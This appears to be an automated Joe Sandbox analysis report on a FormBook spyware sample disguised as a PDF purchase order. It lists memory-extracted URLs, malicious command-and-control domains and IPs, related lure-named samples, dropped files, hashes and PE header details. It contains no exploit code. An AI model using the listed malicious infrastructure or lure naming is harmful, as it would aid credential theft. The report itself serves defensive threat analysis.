https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO-0005082025 pdf.exe, 00000000.00000002.1750530175.0000000003231000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	PO-0005082025 pdf.exe, 00000000.00000002.1757876600.0000000005CA4000.00000004.00000020.00020000.00000000.sdmp, PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-114.png	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jyshe18.buzz	VuOkdnWJwVVuK.exe, 0000000C.00000002.2977853967.0000000000A7B000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/styles/reset.css	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-57.png	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.9.94.85	www.milp.store	Sweden	39570	LOOPIASE	true
172.67.131.144	www.jyshe18.buzz	United States	13335	CLOUDFLARENETUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587583
Start date and time:	2025-01-10 15:09:41 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-0005082025 pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@14/7@5/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 98 Number of non-executed functions: 282
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:10:39	API Interceptor	1x Sleep call for process: PO-0005082025 pdf.exe modified
09:10:41	API Interceptor	11x Sleep call for process: powershell.exe modified
09:12:12	API Interceptor	139061x Sleep call for process: cttune.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.9.94.85	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.milp.store/2j93/
	Order.exe	Get hash	malicious	FormBook	Browse	www.deeplungatlas.org/57zf/
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	www.deeplungatlas.org/57zf/
	Payment Advice.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	proforma invoice.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	shipping documents.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
172.67.131.144	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.jyshe18.buzz/1lpi/
172.67.131.144	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	www.jyshe18.buzz/1lpi/
85.159.66.93	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	www.magmadokum.com/fo8o/
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	www.magmadokum.com/fo8o/
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	www.magmadokum.com/fo8o/
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	www.tabyscooterrentals.xyz/l5cx/
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	www.magmadokum.com/fo8o/
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	www.magmadokum.com/fo8o/
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.letsbookcruise.xyz/uwne/
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	www.magmadokum.com/fo8o/
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.magmadokum.com/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.magmadokum.com/fo8o/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.milp.store	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	new.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
natroredirect.natrocdn.com	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	85.159.66.93
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.jyshe18.buzz	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.131.144
www.jyshe18.buzz	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	172.67.131.144

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	zrNcqxZRSM.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	188.114.96.3
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	http://www.lpb.gov.lr	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
	https://samantacatering.com/	Get hash	malicious	Unknown	Browse	104.21.83.97
	https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGN	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.filemail.com/d/rxythqchkhluipl?skipreg=true	Get hash	malicious	Unknown	Browse	104.17.24.14
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.79.9
	http://arpaeq.ca	Get hash	malicious	Unknown	Browse	188.114.96.3
CIZGITR	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	85.159.66.93
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.73.166.16
LOOPIASE	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	new.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Hire P.O.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Order.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	http://tokenpuzz1le.com/	Get hash	malicious	HTMLPhisher	Browse	194.9.94.86

Process:	C:\Users\user\Desktop\PO-0005082025 pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.354777075714867
Encrypted:	false
SSDEEP:	24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
MD5:	92C17FC0DE8449D1E50ED56DBEBAA35D
SHA1:	A617D392757DC7B1BEF28448B72CBD131CF4D0FB
SHA-256:	DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
SHA-512:	603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\--cG1-69-

Download File

Process:	C:\Windows\SysWOW64\cttune.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bowru2m.fhh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpmykwmu.pbo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfclfoud.juu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4yysyzg.gjb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.755626716444498
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO-0005082025 pdf.exe
File size:	792'064 bytes
MD5:	4185664f91aeccf6d3dca2609fe0659e
SHA1:	6cffdbc96d796affef71f83da5ae79e96c940f43
SHA256:	ce21bf206f998dad01775ae8fe4e487777cc8e9dc503c73f977b1fd41b9b312e
SHA512:	54e1d4a79cdc5d119cc573b5420ecd6290307606b3b261321bcf66749dd0c97510bb4f48e58cc1953bf326e62012bd8c4d1a971d505a346fa5e3c8bdae7e0cd5
SSDEEP:	24576:3oOT8S0ck79YELOKEVBhJImjVG10IRkGfb/eC4C/:3os8S0ciFSrVBhXG10UkGfbF4C
TLSH:	F7F40149225AED07C8A247B069F1E3F916748EC8FA11D3034BFEBDFB7D392566518284
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~g..............0......*......^.... ... ....@.. ....................................`................................

File Icon


Icon Hash:	33362c2d36335470

Static PE Info

General

Entrypoint:	0x4c095e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677EB7EB [Wed Jan 8 17:37:47 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
